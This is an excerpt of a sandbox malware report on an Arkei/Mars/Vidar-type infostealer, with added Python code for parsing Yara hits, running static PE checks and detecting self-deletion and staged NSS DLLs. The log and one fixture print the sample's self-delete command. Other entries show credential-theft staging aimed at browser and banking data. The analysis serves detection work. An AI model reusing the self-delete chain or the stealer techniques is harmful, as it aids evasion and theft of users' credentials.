Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: m0wsoI3.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
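Added example, not part of the Joe Sandbox report: a parser for the "Matched rule" evidence lines above, so the Yara hits can be turned into structured records and the family attribution (Arkei, Mars, Vidar) can be counted per distinct source instead of read by eye. It handles both line shapes the report uses (the short "Author:" form and the long "key = value, key = value" form) and the one awkward case in the metadata, a value that itself contains a comma ("scan_context = file, memory"). The sample lines are copied from this page; the field names in the returned dicts are this example's own choice.

```python
"""Parse Joe Sandbox 'Matched rule' evidence lines into structured records
and aggregate family attribution across the sources each rule fired on.
Added example; the sample lines are copied from this report's System
Summary section (both the short 'Author:' form and the long metadata form)."""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^Source: (?P<source>.+?), type: (?P<type>\S+) Matched rule: (?P<rest>.+)$")
# 'key = value' pairs. A value may itself contain ", " (scan_context = file, memory),
# so a value only ends where the next ", key = " begins, or at end of line.
KV_RE = re.compile(r"(\w+) = (.*?)(?=, \w+ = |$)")


def parse_match_line(line: str) -> dict:
    """One evidence line -> {source, scan_type, rule, meta}."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a matched-rule line: {line[:60]!r}")
    rest = m.group("rest")
    if " Author: " in rest:
        # Short form: "<rule name or description> Author: <name>"
        rule, _, author = rest.partition(" Author: ")
        meta = {"author": author}
    else:
        # Long form: "<rule_name> key = value, key = value, ..."
        rule, _, meta_text = rest.partition(" ")
        meta = dict(KV_RE.findall(meta_text))
    return {"source": m.group("source"), "scan_type": m.group("type"),
            "rule": rule, "meta": meta}


def attribute(lines) -> dict:
    """Family -> sorted list of the distinct sources it matched in.
    threat_name is used when the rule metadata carries one, else the rule name."""
    by_family = defaultdict(set)
    for rec in map(parse_match_line, lines):
        family = rec["meta"].get("threat_name", rec["rule"])
        by_family[family].add(rec["source"])
    return {family: sorted(srcs) for family, srcs in by_family.items()}


# Copied from this report. The last two lines are the same evidence line twice;
# the set-based aggregation collapses them into a single source.
SAMPLE_LINES = [
    "Source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12",
    "Source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_mars_stealer_xor_routine author = Sekoia.io, description = Detect Mars Stealer based on a specific XOR routine, creation_date = 2022-04-06, classification = TLP:CLEAR, version = 1.0, id = 3e2c7440b2fc9e4b039e6fa8152ac8ff",
    "Source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12",
    "Source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23",
    "Source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23",
    "Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23",
    "Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23",
]
```

On these lines `attribute(SAMPLE_LINES)` yields three distinct sources for Windows.Trojan.Vidar, two for Windows.Trojan.ArkeiStealer and one for the Sekoia Mars XOR rule, which matches the report's verdict that the unpacked code is the Arkei/Mars lineage while the Vidar signatures fire on decrypted runtime strings. The `fingerprint` and `id` values come straight out of the metadata, so the same records can be used to pin the exact rule revision when comparing reports.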

Data Obfuscation

Source: C:\Users\user\Desktop\m0wsoI3.exe Unpacked PE file: 0.2.m0wsoI3.exe.60900000.1.unpack
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00409220
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: mozglue.dll.0.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60983000 pushad ; iretd 0_2_60983031
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096D990 push eax; ret 0_2_6096D9C0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60911F9E push ecx; mov dword ptr [esp], ebx 0_2_60911FD3
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60987F71 pushad ; iretd 0_2_60987F74
Source: m0wsoI3.exe Static PE information: section name: .text entropy: 7.245682295128179
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\ProgramData\softokn3.dll
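Added example, not part of the Joe Sandbox report: the static PE checks behind the flags this page raises for m0wsoI3.exe (a .text section marked IMAGE_SCN_CNT_CODE together with IMAGE_SCN_MEM_WRITE, a section with an empty name, a .text entropy of 7.25, and RELOCS_STRIPPED alongside DYNAMIC_BASE and NX_COMPAT), implemented with the Python standard library only so it runs without pefile. The PE it parses is a constructed minimal PE32 image that reproduces those traits, not the analysed sample. The 7.0 entropy threshold is a heuristic chosen here, and the one caveat worth carrying over to the report is that a DYNAMIC_BASE flag on an image whose relocations were stripped does not actually give the process ASLR: without a relocation table the loader cannot rebase the image.

```python
"""Static PE checks matching what the report flags for m0wsoI3.exe: a code
section that is also writable, a nameless section, section entropy, and the
RELOCS_STRIPPED + DYNAMIC_BASE combination. Standard library only. The PE
built below is a constructed minimal PE32 image, not the analysed sample."""
import math
import struct

# IMAGE_SECTION_HEADER.Characteristics bits
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# IMAGE_FILE_HEADER.Characteristics bits
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
HIGH_ENTROPY = 7.0  # heuristic threshold (assumption); the report's .text scores 7.25


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes) -> dict:
    """Read the COFF header, DllCharacteristics and section table of a PE32 image."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, n_sections, _stamp, _symtab, _nsyms,
     opt_size, file_chars) = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 images are handled here")
    dll_chars = struct.unpack_from("<H", image, opt + 70)[0]  # DllCharacteristics (PE32 offset)
    sections = []
    for i in range(n_sections):
        (name, _vsize, _va, raw_size, raw_ptr, _rel, _lin, _nrel, _nlin,
         chars) = struct.unpack_from("<8sIIIIIIHHI", image, opt + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "characteristics": chars,
            "entropy": shannon_entropy(image[raw_ptr:raw_ptr + raw_size]),
        })
    return {"file_characteristics": file_chars, "dll_characteristics": dll_chars,
            "sections": sections}


def pe_findings(info: dict) -> list:
    """The static observations a reviewer would act on, as short strings."""
    findings = []
    for s in info["sections"]:
        label = s["name"] or "<nameless>"
        c = s["characteristics"]
        if c & IMAGE_SCN_CNT_CODE and c & IMAGE_SCN_MEM_WRITE:
            findings.append(f"writable code section: {label}")
        if not s["name"]:
            findings.append("nameless section")
        if s["entropy"] > HIGH_ENTROPY:
            findings.append(f"high entropy section: {label} ({s['entropy']:.2f})")
    if (info["file_characteristics"] & IMAGE_FILE_RELOCS_STRIPPED
            and info["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE):
        # No relocation table means the loader cannot rebase the image, so the
        # DYNAMIC_BASE flag does not deliver ASLR for this executable.
        findings.append("DYNAMIC_BASE set but relocations stripped: image cannot be rebased")
    return findings


def build_sample_pe() -> bytes:
    """Constructed PE32 reproducing the report's static traits (not the real sample)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224  # size of a PE32 optional header
    file_chars = IMAGE_FILE_RELOCS_STRIPPED | IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, file_chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70,
                     IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
    text_raw = bytes(range(256)) * 4  # every byte value equally often -> entropy exactly 8.0
    blank_raw = b"\0" * 512
    text_ptr = len(dos) + 4 + 20 + opt_size + 2 * 40  # raw data starts right after the headers

    def section(name, raw, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), 0x1000, len(raw), ptr, 0, 0, 0, 0, chars)

    table = (section(b".text", text_raw, text_ptr,
                     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
             + section(b"", blank_raw, text_ptr + len(text_raw), 0x40000040))  # INITIALIZED_DATA|READ
    return dos + b"PE\0\0" + coff + bytes(opt) + table + text_raw + blank_raw
```

Running `pe_findings(parse_pe(open(path, "rb").read()))` on a real 32-bit sample gives the same four classes of finding the report lists; for a PE32+ image the magic check raises, which is deliberate, since the optional header layout differs and silently reading the wrong offsets would produce confident nonsense.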

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\m0wsoI3.exe Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\m0wsoI3.exe" & exit
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00415FC0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress, 0_2_00415FC0
Source: C:\Users\user\Desktop\m0wsoI3.exe Process information set: NOOPENFILEERRORBOX
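Added example, not part of the Joe Sandbox report: detection logic for two behaviours recorded on this page, the delayed self-delete chain (`cmd.exe /c timeout /t 5 & del /f /q "<own path>" & exit`, where the delay exists so the parent can exit and release its image) and the drop of the Mozilla NSS libraries nss3.dll, mozglue.dll, freebl3.dll and softokn3.dll into C:\ProgramData by a process that is not a Mozilla product (the report shows them alongside msvcp140.dll and vcruntime140.dll, with Thunderbird build paths in their PDB strings). The events are constructed Sysmon-style records with assumed field names (EventID 1 = ProcessCreate, 11 = FileCreate, Image, ParentImage, CommandLine, TargetFilename); PID 7292 is taken from the report, every other value is made up. The `ping ... -n N` sleep idiom and the extra staging roots go beyond what this page shows and are included as a generalisation.

```python
"""Detection logic for two behaviours in this report: the delayed
self-delete chain (cmd.exe /c timeout /t 5 & del /f /q "<own path>" & exit)
and Mozilla NSS DLLs (nss3/mozglue/freebl3/softokn3) being written to
C:\\ProgramData by a process that is not a Mozilla product. Events are
constructed Sysmon-style records (EventID 1 = ProcessCreate, 11 = FileCreate);
PID 7292 is taken from the report, everything else is made up."""
import re
from pathlib import PureWindowsPath

# A delay before the delete lets the parent exit so its image is no longer
# locked. "timeout /t N" is what this sample uses; "ping ... -n N" is the
# other common sleep idiom (not on this page, included as a generalisation).
DELAY_RE = re.compile(r"\b(?:timeout\s+/t\s+\d+|ping\s+[^&]*?-n\s+\d+)", re.I)
# del [/switches] "<path>" terminated by '&' or end of line
DEL_RE = re.compile(r'\bdel\b(?:\s+/\w+)*\s+"?([^"&]+?)"?\s*(?:&|$)', re.I)
NSS_DLLS = {"nss3.dll", "mozglue.dll", "freebl3.dll", "softokn3.dll"}
# World-writable staging roots (assumption; the report shows C:\ProgramData)
STAGING_ROOTS = ("c:\\programdata\\", "c:\\users\\public\\", "\\appdata\\local\\temp\\")
# Images allowed to touch NSS DLLs (assumption, for tuning)
MOZILLA_DIRS = ("\\mozilla firefox\\", "\\mozilla thunderbird\\")


def _norm(path: str) -> str:
    """Case-insensitive, quote-stripped Windows path for comparison."""
    return str(PureWindowsPath(path.strip().strip('"'))).lower()


def is_self_delete(event: dict) -> bool:
    """ProcessCreate: cmd.exe deleting its parent's own image after a delay."""
    if PureWindowsPath(event.get("Image", "")).name.lower() != "cmd.exe":
        return False
    cmd = event.get("CommandLine", "")
    delay, delete = DELAY_RE.search(cmd), DEL_RE.search(cmd)
    if not (delay and delete) or delay.start() > delete.start():
        return False
    return _norm(delete.group(1)) == _norm(event.get("ParentImage", ""))


def is_nss_drop(event: dict) -> bool:
    """FileCreate: NSS DLL staged in a writable directory by a non-Mozilla image."""
    target = event.get("TargetFilename", "")
    if PureWindowsPath(target).name.lower() not in NSS_DLLS:
        return False
    if not any(root in target.lower() for root in STAGING_ROOTS):
        return False
    return not any(d in event.get("Image", "").lower() for d in MOZILLA_DIRS)


def triage(events: list) -> list:
    """Run both detections over an event stream; returns (rule, pid) hits in order."""
    hits = []
    for ev in events:
        if ev.get("EventID") == 1 and is_self_delete(ev):
            hits.append(("self_delete_via_cmd", ev["ParentProcessId"]))
        elif ev.get("EventID") == 11 and is_nss_drop(ev):
            hits.append(("nss_dll_staged_in_writable_dir", ev["ProcessId"]))
    return hits


# Constructed events modelled on this report (PID 7292 from the report).
SAMPLE_EVENTS = [
    {"EventID": 11, "ProcessId": 7292, "Image": r"C:\Users\user\Desktop\m0wsoI3.exe",
     "TargetFilename": r"C:\ProgramData\nss3.dll"},
    {"EventID": 11, "ProcessId": 7292, "Image": r"C:\Users\user\Desktop\m0wsoI3.exe",
     "TargetFilename": r"C:\ProgramData\msvcp140.dll"},  # runtime DLL alone: not flagged
    {"EventID": 1, "ProcessId": 7900, "ParentProcessId": 7292,
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\m0wsoI3.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\m0wsoI3.exe" & exit'},
    {"EventID": 1, "ProcessId": 8001, "ParentProcessId": 7999,
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /c del /q "C:\Users\user\Desktop\notes.txt"'},  # ordinary delete
    {"EventID": 11, "ProcessId": 4242, "Image": r"C:\Program Files\Mozilla Firefox\updater.exe",
     "TargetFilename": r"C:\Program Files\Mozilla Firefox\nss3.dll"},  # legitimate install path
]
```

`triage(SAMPLE_EVENTS)` returns two hits, both attributed to PID 7292: the NSS drop and the self-delete. The self-delete rule keys on the deleted path equalling the parent's image rather than on the `timeout`/`del` strings alone, which is what keeps the ordinary `del` of an unrelated file from firing; the NSS rule deliberately ignores msvcp140.dll and vcruntime140.dll, since those runtimes are dropped by plenty of legitimate installers and add nothing once an NSS library has landed in a writable directory.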

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00408370 0_2_00408370
Source: C:\Users\user\Desktop\m0wsoI3.exe Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\m0wsoI3.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\m0wsoI3.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\m0wsoI3.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Windows\SysWOW64\timeout.exe TID: 7924 Thread sleep count: 40 > 30
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00407620
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401280
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401090
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040A150
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 0_2_0040B570
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B110
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040B3A0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6092A5DC sqlite3_os_init,GetSystemInfo, 0_2_6092A5DC
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: QIEKNGVA.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: QIEKNGVA.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: QIEKNGVA.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: QIEKNGVA.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: QIEKNGVA.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000507000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000543000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: QIEKNGVA.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: QIEKNGVA.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: QIEKNGVA.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: QIEKNGVA.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-1/
Source: QIEKNGVA.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: QIEKNGVA.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: QIEKNGVA.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: QIEKNGVA.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: QIEKNGVA.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: QIEKNGVA.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: QIEKNGVA.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: QIEKNGVA.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: QIEKNGVA.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: QIEKNGVA.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\m0wsoI3.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_004054F0 VirtualProtect ?,00000004,00000100,00000000 0_2_004054F0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00409220
